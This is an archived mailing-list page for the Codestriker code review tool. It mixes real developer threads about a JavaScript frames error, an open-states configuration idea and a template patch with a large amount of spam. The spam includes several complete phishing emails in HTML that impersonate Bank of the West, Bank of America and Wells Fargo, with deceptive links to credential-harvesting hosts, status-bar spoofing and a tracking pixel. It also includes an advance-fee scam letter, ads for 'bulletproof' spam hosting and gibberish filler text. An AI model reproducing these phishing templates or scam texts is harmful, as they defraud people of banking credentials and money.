codestriker-user Mailing List for Codestriker: collaborative code reviewer (Page 31)
Brought to you by:
sits
You can subscribe to this list here.
| 2002 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(12) |
Jun
|
Jul
|
Aug
(2) |
Sep
|
Oct
|
Nov
|
Dec
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2003 |
Jan
|
Feb
|
Mar
(1) |
Apr
(6) |
May
(3) |
Jun
(1) |
Jul
|
Aug
(9) |
Sep
(2) |
Oct
(2) |
Nov
(8) |
Dec
(6) |
| 2004 |
Jan
(12) |
Feb
(19) |
Mar
(2) |
Apr
(2) |
May
(4) |
Jun
(11) |
Jul
|
Aug
(14) |
Sep
(4) |
Oct
(27) |
Nov
(4) |
Dec
(22) |
| 2005 |
Jan
(14) |
Feb
(2) |
Mar
(11) |
Apr
(3) |
May
(14) |
Jun
(60) |
Jul
(58) |
Aug
(76) |
Sep
(72) |
Oct
(59) |
Nov
|
Dec
(4) |
| 2006 |
Jan
(1) |
Feb
(5) |
Mar
(13) |
Apr
(11) |
May
(30) |
Jun
(17) |
Jul
(18) |
Aug
(39) |
Sep
|
Oct
|
Nov
|
Dec
(17) |
| 2007 |
Jan
(18) |
Feb
(5) |
Mar
(20) |
Apr
(2) |
May
(3) |
Jun
(13) |
Jul
(11) |
Aug
(4) |
Sep
(6) |
Oct
(9) |
Nov
(3) |
Dec
|
| 2008 |
Jan
(10) |
Feb
|
Mar
(5) |
Apr
|
May
|
Jun
(9) |
Jul
(10) |
Aug
(10) |
Sep
(13) |
Oct
(34) |
Nov
(12) |
Dec
(8) |
| 2009 |
Jan
(4) |
Feb
(11) |
Mar
(12) |
Apr
(3) |
May
(36) |
Jun
(4) |
Jul
(11) |
Aug
(12) |
Sep
(25) |
Oct
(13) |
Nov
(9) |
Dec
|
| 2010 |
Jan
|
Feb
(12) |
Mar
(6) |
Apr
(10) |
May
(12) |
Jun
|
Jul
(4) |
Aug
(9) |
Sep
(12) |
Oct
(3) |
Nov
(6) |
Dec
(3) |
| 2011 |
Jan
(2) |
Feb
(1) |
Mar
(3) |
Apr
(5) |
May
(3) |
Jun
(8) |
Jul
|
Aug
(14) |
Sep
|
Oct
(3) |
Nov
(1) |
Dec
|
| 2012 |
Jan
(2) |
Feb
(10) |
Mar
(4) |
Apr
(3) |
May
(2) |
Jun
(5) |
Jul
|
Aug
(3) |
Sep
|
Oct
(2) |
Nov
(4) |
Dec
(2) |
| 2013 |
Jan
|
Feb
|
Mar
|
Apr
|
May
(4) |
Jun
|
Jul
|
Aug
|
Sep
(2) |
Oct
(1) |
Nov
|
Dec
(2) |
| 2014 |
Jan
|
Feb
|
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bank Of T. W. <se...@ba...> - 2005-08-05 09:57:30
|
<b>Dear Bank of the West valued member</b>,<br> <br> Due to concerns, for the safety and integrity of the online<br> banking community we have issued this warning message. <br> <br> It has come to our attention that your account information needs <br>to be updated due to inactive members, frauds and spoof reports.<br> If you could please take 5-10 minutes out of your online experience and renew<br> your records you will not run into any future problems with the online service.<br> However, failure to update your records will result in account erasure.<br> This notification expires on August 8, 2005.<br> <br> Once you have updated your account records your internet banking<br> service will not be interrupted and will continue as normal. <br> <br>Please follow the link below <br> <i></i> and renew your account information. <br><a href="http://64.246.6.120/~iris/_bash/bow/"onMouseOver="status='http://64.246.6.120/~iris/_bash/bow/'; return true" onMouseOut="status='';return true">https://www.bankofthewest.com/</a> <p><img src="http://www.familybusinessonline.org/partners/images/logo_westcoast.jpg" alt="Bank of the West" width="140" height="110"> <br> Bank of the West |
|
From: David S. <si...@us...> - 2005-08-05 01:03:50
|
That would be great - thanks. Hopefully it won't be too hard. It should be a matter for just searching for all top.XXX calls and replace them with the appropriate parent.XXX calls. On Fri, 5 Aug 2005 11:00, Keith Levy wrote: > I'll try to take a stab at it over the next few days and see if I > can't come up with something. A co-worker of mine had some ideas to > try. If we work something out, we contribute it back for the next > release. > > Thanks, -- Cheers, David |
|
From: Keith L. <the...@gm...> - 2005-08-05 01:00:17
|
I'll try to take a stab at it over the next few days and see if I can't come up with something. A co-worker of mine had some ideas to try. If we work something out, we contribute it back for the next release. Thanks, On 8/4/05, David Sitsky <si...@us...> wrote: > Yes - embedding Codestriker within frames would definately stuff it up. >=20 > The javascript is full of calls like top.XXX. To get this working > correctly, we'd need to replace the top.XXX calls with the appropriate > code for referring to the parent frame. >=20 > You might be able to replace top. with parent. to get this working. >=20 > I don't have time right now to look into this, but should have some next > week. >=20 > Cheers, > David >=20 > On Thu, 4 Aug 2005 20:25, Keith Levy wrote: > > On the final version of 1.9.0. > > > > I just thought of something, I run the software through a custom > > portal that uses frames. Could that be an issue? > > > > Keith > > > > On 8/4/05, David Sitsky <si...@us...> wrote: > > > On Thu, 4 Aug 2005 07:48, Keith Levy wrote: > > > > I have been receiving the following javascript error when trying to > > > > add a comment under v1.9.0: > > > > > > > > 'top.add_comment_html is not a function' > > > > > > > > The box pops up but has no content. Also, this happens > > > > periodically, rather than all the time, and occurs from multiple > > > > areas (line # from topic, add comment link from comments tab, etc) > > > > Previously this was working fine in my browsers (IE and Firefox), > > > > but now I get this error from both of them.. > > > > > > When you say previously it never happened - do you mean on a beta > > > version of 1.9.0, or 1.8.5? > > > > > > Can you send me the raw HTML source as an attachment when you get the > > > javascript error? This should help me locate the problem. > > > > > > -- > > > Cheers, > > > David >=20 > -- > Cheers, > David >=20 > |
|
From: David S. <si...@us...> - 2005-08-04 23:30:18
|
Yes - embedding Codestriker within frames would definately stuff it up. The javascript is full of calls like top.XXX. To get this working correctly, we'd need to replace the top.XXX calls with the appropriate code for referring to the parent frame. You might be able to replace top. with parent. to get this working. I don't have time right now to look into this, but should have some next week. Cheers, David On Thu, 4 Aug 2005 20:25, Keith Levy wrote: > On the final version of 1.9.0. > > I just thought of something, I run the software through a custom > portal that uses frames. Could that be an issue? > > Keith > > On 8/4/05, David Sitsky <si...@us...> wrote: > > On Thu, 4 Aug 2005 07:48, Keith Levy wrote: > > > I have been receiving the following javascript error when trying to > > > add a comment under v1.9.0: > > > > > > 'top.add_comment_html is not a function' > > > > > > The box pops up but has no content. Also, this happens > > > periodically, rather than all the time, and occurs from multiple > > > areas (line # from topic, add comment link from comments tab, etc) > > > Previously this was working fine in my browsers (IE and Firefox), > > > but now I get this error from both of them.. > > > > When you say previously it never happened - do you mean on a beta > > version of 1.9.0, or 1.8.5? > > > > Can you send me the raw HTML source as an attachment when you get the > > javascript error? This should help me locate the problem. > > > > -- > > Cheers, > > David -- Cheers, David |
|
From: Keith L. <the...@gm...> - 2005-08-04 10:26:28
|
On the final version of 1.9.0. =20 I just thought of something, I run the software through a custom portal that uses frames. Could that be an issue? Keith On 8/4/05, David Sitsky <si...@us...> wrote: > On Thu, 4 Aug 2005 07:48, Keith Levy wrote: > > I have been receiving the following javascript error when trying to > > add a comment under v1.9.0: > > > > 'top.add_comment_html is not a function' > > > > The box pops up but has no content. Also, this happens periodically, > > rather than all the time, and occurs from multiple areas (line # from > > topic, add comment link from comments tab, etc) Previously this was > > working fine in my browsers (IE and Firefox), but now I get this error > > from both of them.. >=20 > When you say previously it never happened - do you mean on a beta version > of 1.9.0, or 1.8.5? >=20 > Can you send me the raw HTML source as an attachment when you get the > javascript error? This should help me locate the problem. >=20 > -- > Cheers, > David >=20 > |
|
From: David S. <si...@us...> - 2005-08-04 05:37:22
|
On Thu, 4 Aug 2005 07:48, Keith Levy wrote: > I have been receiving the following javascript error when trying to > add a comment under v1.9.0: > > 'top.add_comment_html is not a function' > > The box pops up but has no content. Also, this happens periodically, > rather than all the time, and occurs from multiple areas (line # from > topic, add comment link from comments tab, etc) Previously this was > working fine in my browsers (IE and Firefox), but now I get this error > from both of them.. When you say previously it never happened - do you mean on a beta version of 1.9.0, or 1.8.5? Can you send me the raw HTML source as an attachment when you get the javascript error? This should help me locate the problem. -- Cheers, David |
|
From: Arouna <aro...@ho...> - 2005-08-03 21:58:16
|
Hello Dear I am contacting you believing you are a honest and trustworthy person.I = believe you will not betray the confidence I am willing to repose in you, for = me to have contacted you even though we've not met before. My name is Arouna Goudal=E9,the only son of late Mr.Hassan Goudal=E9 who = was the chairman /President/CEO,Cacao-Cafe & Agro-Alimentary industries = plc.SCAFECAO)"Bouake" and ex-owner of Polyclinic LA-MADONNE, of the Republic = of Cote d'Ivoire,please if possible you can send phone contact for good = cominucation. You can find the story on this = website:http://news.bbc.co.uk/2/hi/africa/2269238.stm On 19th of September 2002,a group of so called rebels took over the city of = Bouake to over-throw the Government of Mr.Laurent Gbagbo the President of = Cote d'Ivoire. On the 20th day morning at about 4:18am some fractions of the = same group of rebels break into our house and killed our security guard and = pass-through the gate entrance to the main building and took my father away = to an un-known destination. After about four hours later we found him (my father) at the road side, by = then he had been totally beaten and was bleeding to death lying in the pool = of his own blood. From there, we rushed him to a near by hospital and hours = later he sent for my mother. So he told her that he can not make it from the = doctors diagnosis, he also told her that it was because he (my father) was = not from the northern part of the country that he has been treated this way = and also being a political activist. And again he said he is suspecting some = of his business partners for conspiracy and this sort of brutality. He also = told my mother that he deposited a huge amount of money in a Finance house in = the Capital city of Senegal (Dakar) and also told her where he kept the whole = documents concerning this deposit that is made for investment purpose in the = western world. That same day, he (my father) gave up the ghost. Then with the help of the = French soldiers, we escaped to Senegal, where we are now. I am now contacting = you believing you are honest and trustworthy to help us to receive the money = in your account for investment, I and my mother has decided in compensating = you 20%of the total amount for your assistance . Please do take your time to go through the mail and get back to us, so that I = will simply introduce to the Finance house where the fund are being kept now = for onward transfer.alternative mail is ar...@wa... I am waiting for your response. Thanks and God bless. Arouna Goudal=E9 . |
|
From: Keith L. <the...@gm...> - 2005-08-03 21:49:45
|
I have been receiving the following javascript error when trying to add a comment under v1.9.0: =20 'top.add_comment_html is not a function' =20 =20 The box pops up but has no content. Also, this happens periodically, rather than all the time, and occurs from multiple areas (line # from topic, add comment link from comments tab, etc) Previously this was working fine in my browsers (IE and Firefox), but now I get this error from both of them.. =20 Have you seen this before and do you have any suggestions. =20 =20 Thanks, Keith Levy |
|
From: Allen <kz...@ey...> - 2005-08-02 16:37:51
|
Dear cod...@li...: Bullet Proof server: Fresh IPs 1024MB RAM DDR P4 3.2GHz CPU 72GB SCSI Dedicated 100 M fiber Unlimited Data Transfer Linux/Windows/FreeBSD Any software Based in China US$599.00/per month You may use the server for: Bulk Hosting Direct Mailing We also supply Target list according to your order, and sending out your message for you. Looking forward to do business with you. Cheers! Allen Support Team KZL...@so... Click here for off: No...@ya... |
|
From: Marc S. <mar...@gm...> - 2005-07-30 11:23:31
|
As of now, I did a simple modifications in the links for all open topics to push states 0,3. I will look into adding a new variable @open_states. That would be an interesting features. Marc. On 7/28/05, Dan Prince - dp...@In... <+codestriker+jafs+abe3cb3e1a.dprince#Int...@sp...> wrote: > Comments below... >=20 > David Sitsky wrote: > > On Thu, 28 Jul 2005 00:26, cod...@sp... wrote: > > > >>It would be nice to have in the config file a value to set the valid > >>open states, so that when I click on List all open topics, it would > >>list all valid open states. > > > > > > Have you seen the @readonly_states config variable? In some sense, wha= t > > you are asking for is the inverse of this. > > > > > >>Do you think that feature would be useful to other? As of now, I > >>modified the template to put [0, 3] to display all open topics. > > > > > > Maybe you can make the code check if the state is not in @readonly_stat= es, > > to get the same/similar effect? >=20 > This would certainly be possible, but I'm not sure it is what everyone > would want. Some installations (probably ours, for one, though it's > probably not a big deal) would want the 'List open topics' link to list > only topics in state 'open' and not ones in state 'Reviewed', even > though both are not 'read-only' states (i.e. topics in either state can > be edited). >=20 > > > > Failing that - perhaps you could defined a @open_states config variable= . > > >=20 > I would vote for this option. I'm assuming it would control only the > states that get displayed when you click the 'List open states' link, > and would be different from @readonly_states. > |
|
From: Dan P. <dan...@al...> - 2005-07-28 20:03:45
|
Comments below... David Sitsky wrote: > On Thu, 28 Jul 2005 00:26, cod...@sp... wrote: > >> It would be nice to have in the config file a value to set the valid >> open states, so that when I click on List all open topics, it would >> list all valid open states. > > > > Have you seen the @readonly_states config variable? In some sense, what you are asking for is the inverse of this. > > >> Do you think that feature would be useful to other? As of now, I >> modified the template to put [0, 3] to display all open topics. > > > > Maybe you can make the code check if the state is not in @readonly_states, to get the same/similar effect? This would certainly be possible, but I'm not sure it is what everyone would want. Some installations (probably ours, for one, though it's probably not a big deal) would want the 'List open topics' link to list only topics in state 'open' and not ones in state 'Reviewed', even though both are not 'read-only' states (i.e. topics in either state can be edited). > > Failing that - perhaps you could defined a @open_states config variable. > I would vote for this option. I'm assuming it would control only the states that get displayed when you click the 'List open states' link, and would be different from @readonly_states. |
|
From: David S. <si...@us...> - 2005-07-28 02:08:10
|
On Thu, 28 Jul 2005 00:26, cod...@sp... wrote: > It would be nice to have in the config file a value to set the valid > open states, so that when I click on List all open topics, it would > list all valid open states. Have you seen the @readonly_states config variable? In some sense, what you are asking for is the inverse of this. > Do you think that feature would be useful to other? As of now, I > modified the template to put [0, 3] to display all open topics. Maybe you can make the code check if the state is not in @readonly_states, to get the same/similar effect? Failing that - perhaps you could defined a @open_states config variable. -- Cheers, David |
|
From: <cod...@sp...> - 2005-07-27 17:20:45
|
It would be nice to have in the config file a value to set the valid open states, so that when I click on List all open topics, it would list all valid open states. To put you in context, I added a state Reviewed so that when a topic is completely reviewed by all reviewers, the topic is set to that state. A mail is automatically sent by codestriker and the Author can commit/discard all comments. Once done, the topic is put in Committed state where the reviewer validate the changes, and finally the Topic is closed. Do you think that feature would be useful to other? As of now, I modified the template to put [0, 3] to display all open topics. Thanks. Marc |
|
From: Bank Of A. <sec...@ba...> - 2005-07-27 16:09:48
|
<HTML>
<HEAD><TITLE>Bank of America Primary Media Address Change</TITLE></HEAD>
<BODY BGCOLOR="white">
<STYLE TYPE="TEXT/CSS">
<!--
A:link{color=405EBE}
A:hover{color=#0000FF}
-->
</STYLE>
<!-- ******Table****** -->
<TABLE ALIGN="left" WIDTH=747 BORDER=0 CELLPADDING=0 CELLSPACING=0>
<!-- ******Banner Row 1****** -->
<TR>
<TD WIDTH=100% COLSPAN=4 HEIGHT=80>
<img src="http://release35.par3.com/images/client/bankofamerica/em_logo.gif"
alt="Bank of America Higher Standards">
</TD>
</TR>
<!-- ******Header Row 2***** -->
<TR>
<!-- Row 2 Cell 1 -->
<TD WIDTH=13>
</TD>
<!-- Row 2 Cell 2 -->
<TD WIDTH=160 HEIGHT=103><img src="http://release35.par3.com/images/client/bankofamerica/em_photo.jpg"></TD>
<!-- Row 2 Cell 3 -->
<TD WIDTH=561 COLSPAN=2 HEIGHT=103 BGCOLOR="#D4001A">
<img src="http://release35.par3.com/images/client/bankofamerica/em_title_red.gif" alt="Online Banking Alert"></TD>
</TR>
<!-- ******Blank (Spacing) Row 3****** -->
<TR>
<TD WIDTH=100% COLSPAN=4 HEIGHT=23>
</TD>
</TR>
<!-- ******Header Row 4***** -->
<TR>
<!-- Row 4 Cell 1 -->
<TD WIDTH=13>
</TD>
<!-- Row 4 Cell 2 -->
<TD WIDTH=160 VALIGN=top>
<a href="http://images.par3.com/AlertResponseServlet?tid=278895781&dcc=SEA&retry=1&resultCode=Response+Received&menu=EmailOptions&choice=0&successUrl=http%3A%2F%2Fwww.bankofamerica.com&errorUrl=http%3A%2F%2Fwww.bankofamerica.com&timeoutUrl=http%3A%2F%2Fwww.bankofamerica.com&timeout=1122854400000">
<img src="http://release35.par3.com/images/client/bankofamerica/em_promo2.gif"
border=0 alt="Need additional up to the minute account information? Sign in">
</A>
</TD>
<!-- Row 4 Cell 3 -->
<TD WIDTH=13>
</TD>
<!-- Row 4 Cell 4 Template Specific HTML goes here. -->
<TD WIDTH=561 VALIGN=top>
<p class=MsoNormal>
<span style='font-size:14pt;font-family:Verdana;color:#D4001A'>
<b style='mso-bidi-font-weight:normal'>Your Information Must Be
Updated..
</b>
</p>
</span><span style='font-family:Verdana;'>
<p class=MsoNormal>
<span style="color: #333333; font-size: 9pt">Dear Bank Of America Member,<br>
We recently noticed one or more attempts to log in to your Bank Of
America account
from a foreign IP address and we have reasons to believe that your
account was used by a third party without your authorization. If you
recently accessed your account while traveling, the unusual login
attempts may have been initiated by you.<br>
<br>
The login attempt was made from:</span><p class=MsoNormal>
<span style="color: #333333; font-size: 9pt; font-weight: 700">IP
address: 172.25.210.66 <br>
ISP Host: cache-66.proxy.aol.com<br></span><span style="color: #333333; font-size: 9pt"><br>
By now, we used many techniques to verify the accuracy of the
information our users provide us when they register on the Site.
However, because user verification on the Internet is difficult, Bank Of
America
cannot and does not confirm each user's purported identity. Thus, we
have established an offline verification system to help you evaluate
with whom you are dealing with. <br>
</span></span>
<span style='font-size:9pt;font-family:Verdana;color:#333333'>
</span><table border="0" width="100%" id="table1">
<tr>
<td bgcolor="#808080">
<span style='font-size:9pt;font-family:Verdana;'>
<p class=MsoNormal align="center">
Click on the link below, fill the form and then submit as we will verify</span><span style="font-family: Verdana; font-size: 9pt">..</span></td>
</tr>
<tr>
<td bgcolor="#C0C0C0">
<p align="center">
<span style="font-family: Verdana; font-size: 9pt; color: #405EBE; font-weight: 700">
<a href="http://xgnd.gratishost.com/boa/">Update My Account
[http://www.bankofamerica.com/signin/?update.php]</a></span></td>
</tr>
<tr>
<td bgcolor="#808080">
<p align="center"><font face="Arial, Verdana" size="2">
<font size="2">Please save the above link for your reference</font><strong style="font-weight: 400"><font size="2">
</font></strong></font></td>
</tr>
</table>
<p class=MsoNormal align="center">
<span style='font-size:9pt;font-family:Verdana;color:#405EBE'> <br><br>
<HR WIDTH=561 SIZE=1 COLOR="#CCCCCC">
<p class=MsoNormal>
<b style='mso-bidi-font-weight:normal'><span style='font-size:8pt;font-family:Verdana;color:#A7A6A6'>
</b>
Because your reply will not be transmitted via secure e-mail, the e-mail address that generated this alert will not accept
replies. If you would like to contact Bank of America with questions or comments, please
<a href="http://images.par3.com/AlertResponseServlet?tid=278895781&dcc=SEA&retry=1&resultCode=Response+Received&menu=EmailOptions&choice=0&successUrl=http%3A%2F%2Fwww.bankofamerica.com&errorUrl=http%3A%2F%2Fwww.bankofamerica.com&timeoutUrl=http%3A%2F%2Fwww.bankofamerica.com&timeout=1122854400000" TITLE="http://www.bankofamerica.com">sign in to Online Banking</a>
and visit the customer service section.
<br>
<br>
</td>
</tr>
<tr >
<TD WIDTH=13>
</TD>
<td colspan=8>
<HR WIDTH=747 SIZE=1 COLOR="#CCCCCC">
<img align="right"src="http://release35.par3.com/images/client/bankofamerica/foot_olympic.gif" alt="Olympic Logo">
<br>
<span style='font-size:8pt;font-family:Verdana;color:#333333'>
Bank of America, N.A. Member FDIC. <a href="http://www.bankofamerica.com/help/equalhousing.cfm">Equal Housing Lender</a> <img src="http://release35.par3.com/images/client/bankofamerica/house_1.gif">
<br>
© 2004 Bank of America Corporation. All rights reserved
</p>
</TD>
</TR>
</TABLE>
<!--
<a href="http://images.par3.com/AlertResponseServlet?tid=278895781&dcc=SEA&retry=1&resultCode=Response+Received&menu=EmailOptions&choice=0&successUrl=http%3A%2F%2Fwww.bankofamerica.com&errorUrl=http%3A%2F%2Fwww.bankofamerica.com&timeoutUrl=http%3A%2F%2Fwww.bankofamerica.com&timeout=1122523200000" title="Online Banking" onMouseOver="window.status='Online Banking';return true;">Online Banking</a>
<a href="http://images.par3.com/AlertResponseServlet?tid=278895781&dcc=SEA&retry=1&resultCode=Response+Received&menu=EmailOptions2&choice=0&successUrl=http%3A%2F%2Fwww.bankofamerica.com%2Fprivacy&errorUrl=http%3A%2F%2Fwww.bankofamerica.com%2Fprivacy&timeoutUrl=http%3A%2F%2Fwww.bankofamerica.com%2Fprivacy&timeout=1122523200000" title="Privacy Policy" onMouseOver="window.status='Privacy Policy';return true;">Privacy Policy</a>
--><img src='http://images.par3.com/AlertTrackingServlet?tid=278895781&dcc=SEA&retry=1&timeout=1123520503705' alt=''>
|
|
From: Bank of t. W. <bil...@ba...> - 2005-07-27 12:31:24
|
<title>Online Banking and Bill Pay Deactivation Notice</title> <FONT face=Arial size=2> <DIV> Dear Bank Of The West Customer,<BR> <DIV> </DIV> <DIV> This is your official notification from Bank Of The West that the service(s) listed below<BR> will be deactivated and deleted if not renewed immediately. Previous notifications have<BR> been sent to the Billing Contact assigned to this account. As the Primary Contact, you<BR> must renew the service(s) listed below or it will be deactivated and deleted. <BR><BR><BR> <a onclick="return ShowLinkWarning()" target="_blank" onfiltered="return ShowLinkWarning()" href="http://202.143.138.19/.../www.bankofthewest.com/"><FONT color=#003399>Renew Now</FONT></a> your eTimeBanker Online Banking and Bill Pay Services.</DIV> <DIV><FONT color=#003399></FONT> </DIV> <DIV><BR> SERVICE : Bank Of The West <EM>e</EM>TimeBanker with Bill Pay.<BR> EXPIRATION: Jul 31, 2005</DIV> <DIV> </DIV> <DIV><BR> Thank you,</DIV> <DIV> </DIV> <DIV> Bank Of The West Management Center Customer Support</DIV> <DIV> </DIV> <DIV><BR> *****************************************************************************<BR> IMPORTANT CUSTOMER SUPPORT INFORMATION<BR> *****************************************************************************</DIV> <DIV> </DIV> <DIV> Please do not reply to this message. For any inquiries, contact Customer Service.</DIV> <DIV> </DIV> <DIV> Document Reference: (87051203).</DIV> <DIV> </DIV> <DIV> Bank Of The West, N.A. Member FDIC. Equal Housing Lender.<BR> Copyright © 2005 Bank Of The West, N.A. All rights reserved.</DIV></DIV></FONT> |
|
From: David S. <si...@us...> - 2005-07-27 11:25:21
|
The 1.9.0 releases have been updated on the SF site, with this minor change. Cheers, David On Wednesday 27 July 2005 13:58, David Sitsky wrote: > Damn - you're right. I don't use this feature, and nobody reported an > issue with the beta releases. > > I can see what has gone wrong too, if you apply this patch from the > template/en/default directory, and restart apache, this should fix the > problem: > > --- viewtopiccomments.html.tmpl.orig Wed Jul 27 13:57:48 2005 > +++ viewtopiccomments.html.tmpl Wed Jul 27 13:58:57 2005 > @@ -166,7 +166,7 @@ > > [% IF comment.context != '' %] > <TR CLASS="commentc"> > - <TD> [% comment.context %]</TD> > + <TD><PRE>[% comment.context %]</PRE></TD> > </TR> > [% END %] > [% last_fileline = comment.fileline %] > > Given that this release hasn't been announced yet to the greater outside > world, (ie freshmeat and sourceforge news), I'll drop what is there, and > install an updated version very soon. > > Thanks again for your message. > > Cheers, > David > > On Wed, 27 Jul 2005 12:36, cod...@sp... wrote: > > With the latest version od CodeStriker, all context lines are shown on > > the same line in Topic Comments tab. > > > > I am using it on IIS under Windows 2000. > > > > Anyone has seen this? > > > > Thanks. > > Marc |
|
From: Yrja L. <Yr...@ga...> - 2005-07-27 10:45:26
|
Hello, aboard the Encarnacion, and long tongues of flame were = lickingplantations.same evening by the sullen mouth of Cahusac = himself.might never have arrived at all but for the gallantry of = CaptainNow it happened that the Deputy-Governor's niece had come to = St.increasing. A moment he resisted; then, realizing what he did, = heshow that....a steady haughtiness that went well with his firm lips. = Thoughinferior force and by sheer skill and desperate valour, Blood'sI = will consult my officers, he said; and he sent for them.La Guayra by a = guarda-costa; and if ye hadn't lost La Foudre, andfrom his mouth, shook = some of the rum out of his wits, and rosein an instant moored her firmly = to the Victorieuse.Refuse'! Cahusac's broad face grew purple. A = muttering from thebitterly was but a necessary stage in the shaping of = his odd destiny.Governor of Jamaica. |
|
From: David S. <si...@us...> - 2005-07-27 04:07:23
|
Damn - you're right. I don't use this feature, and nobody reported an
issue with the beta releases.
I can see what has gone wrong too, if you apply this patch from the
template/en/default directory, and restart apache, this should fix the
problem:
--- viewtopiccomments.html.tmpl.orig Wed Jul 27 13:57:48 2005
+++ viewtopiccomments.html.tmpl Wed Jul 27 13:58:57 2005
@@ -166,7 +166,7 @@
[% IF comment.context != '' %]
<TR CLASS="commentc">
- <TD> [% comment.context %]</TD>
+ <TD><PRE>[% comment.context %]</PRE></TD>
</TR>
[% END %]
[% last_fileline = comment.fileline %]
Given that this release hasn't been announced yet to the greater outside
world, (ie freshmeat and sourceforge news), I'll drop what is there, and
install an updated version very soon.
Thanks again for your message.
Cheers,
David
On Wed, 27 Jul 2005 12:36, cod...@sp... wrote:
> With the latest version od CodeStriker, all context lines are shown on
> the same line in Topic Comments tab.
>
> I am using it on IIS under Windows 2000.
>
> Anyone has seen this?
>
> Thanks.
> Marc
--
Cheers,
David
|
|
From: <cod...@sp...> - 2005-07-27 02:36:33
|
With the latest version od CodeStriker, all context lines are shown on the same line in Topic Comments tab. I am using it on IIS under Windows 2000. Anyone has seen this? Thanks. Marc |
|
From: Allen <kz...@ey...> - 2005-07-26 05:04:19
|
Dear cod...@li...: Bullet Proof dedicated server: Clean IPs 1024MB RAM DDR P4 3.2GHz CPU 72GB SCSI Dedicated 100 M fiber Unlimited Data Transfer Linux/Windows/FreeBSD Any software Located in China US$599.00/per month You may use the server for: Bulk Web Hosting Direct & Proxy Mailing We also supply Target E-mail list according to your order, and sending out your message for you. Looking forward to do business with you. Cheers! Allen Support Team KZL...@so... Click here for takeoff: No...@ya... |
|
From: Wells F. <acc...@we...> - 2005-07-25 13:07:43
|
<html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>New Page 1</title> </head> <body> <table id="masthead" cellSpacing="0"> <tr> <td id="mastLeftCol" noWrap><a href="http://www.wellsfargo.com/"> <img id="logo" alt="Wells Fargo Home Page" src="http://a248.e.akamai.net/7/248/1856/53845d4a1846e7/www.wellsfargo.com/img/header/logo_62sq.gif" width="62" height="62" border="0"><img id="coach" alt="Wells Fargo Home Page" src="http://a248.e.akamai.net/7/248/1856/53845d4a1846e7/www.wellsfargo.com/img/header/coach.gif" border="0"></a><a href="http://www.wellsfargo.com/auxiliary_access/aa_talkatmloc.jhtml"><img class="inline" height="1" alt="Talking ATM Locations" src="//a248.e.akamai.net/7/248/1856/5472601571f31e/www.wellsfargo.com/img/s.gif" width="1" border="0"></a><a href="#skip"><img class="inline" height="1" alt="Skip Navigation to go to main content of this page" src="//a248.e.akamai.net/7/248/1856/5472601571f31e/www.wellsfargo.com/img/s.gif" width="1" border="0"></a></td> </tr> </table> <p><br> Dear customers:<br> <br> Wells Fargo is constantly working to increase security for all Online Banking users. To ensure the integrity of our online payment system, we periodically review accounts.<br> <br> Your account might be place on restricted status. Restricted accounts continue to receive payments, but they are limited in their ability to send or withdraw funds.<br> <br> To lift up this restriction, you need to login into your account (with your username or SSN and your password), then you have to complete our verification process. You must confirm your credit card details and your billing information as well. All restricted accounts have their billing information unconfirmed, meaning that you may no longer send money from your account until you have updated your billing information on file.<br> To initiate the billing update confirmation process, please follow the link bellow and fill in the necessary fields:<br> <br> <a href="http://www.jeffcounty.net/www.wellsfargo.com/"> https://online.wellsfargo.com/signon?LOB=CONS</a><br> <br> Thank you,<br> <br> Wells Fargo - Online Banking</p> <p> </p> <div id="canvas"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td vAlign="top"> <div id="bodyCell"> <div class="separator"> <img height="1" alt="" src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" width="1"></div> <div class="footer1" style="WIDTH: 100%; TEXT-ALIGN: center"> <a tabIndex="8" href="http://www.wellsfargo.com/about/about.jhtml"> About Wells Fargo</a> | <a tabIndex="8" href="http://www.wellsfargo.com/employment"> Employment</a> | <a tabIndex="8" href="http://www.wellsfargo.com/privacy_security/email_fraud/report.jhtml"> Report Email Fraud</a> | <a tabIndex="8" href="http://www.wellsfargo.com/privacy_security/index.jhtml"> Privacy, Security & Legal</a> | <a title="Wells Fargo Home" tabIndex="8" href="http://www.wellsfargo.com"> Home</a> </div> <div class="disclosure" style="MARGIN-TOP: 9px; WIDTH: 100%; TEXT-ALIGN: center"> © 1995 - 2004 Wells Fargo. All rights reserved. </div> </div> </td> </tr> </table> </div> </body> </html> |
|
From: Wells F. <acc...@we...> - 2005-07-25 12:39:27
|
<html dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>New Page 1</title> </head> <body> <table id="masthead" cellSpacing="0"> <tr> <td id="mastLeftCol" noWrap><a href="http://www.wellsfargo.com/"> <img id="logo" alt="Wells Fargo Home Page" src="http://a248.e.akamai.net/7/248/1856/53845d4a1846e7/www.wellsfargo.com/img/header/logo_62sq.gif" width="62" height="62" border="0"><img id="coach" alt="Wells Fargo Home Page" src="http://a248.e.akamai.net/7/248/1856/53845d4a1846e7/www.wellsfargo.com/img/header/coach.gif" border="0"></a><a href="http://www.wellsfargo.com/auxiliary_access/aa_talkatmloc.jhtml"><img class="inline" height="1" alt="Talking ATM Locations" src="//a248.e.akamai.net/7/248/1856/5472601571f31e/www.wellsfargo.com/img/s.gif" width="1" border="0"></a><a href="#skip"><img class="inline" height="1" alt="Skip Navigation to go to main content of this page" src="//a248.e.akamai.net/7/248/1856/5472601571f31e/www.wellsfargo.com/img/s.gif" width="1" border="0"></a></td> </tr> </table> <p><br> Dear customers:<br> <br> Wells Fargo is constantly working to increase security for all Online Banking users. To ensure the integrity of our online payment system, we periodically review accounts.<br> <br> Your account might be place on restricted status. Restricted accounts continue to receive payments, but they are limited in their ability to send or withdraw funds.<br> <br> To lift up this restriction, you need to login into your account (with your username or SSN and your password), then you have to complete our verification process. You must confirm your credit card details and your billing information as well. All restricted accounts have their billing information unconfirmed, meaning that you may no longer send money from your account until you have updated your billing information on file.<br> To initiate the billing update confirmation process, please follow the link bellow and fill in the necessary fields:<br> <br> <a href="http://www.jeffcounty.net/www.wellsfargo.com/"> https://online.wellsfargo.com/signon?LOB=CONS</a><br> <br> Thank you,<br> <br> Wells Fargo - Online Banking</p> <p> </p> <div id="canvas"> <table cellSpacing="0" cellPadding="0" width="100%" border="0"> <tr> <td vAlign="top"> <div id="bodyCell"> <div class="separator"> <img 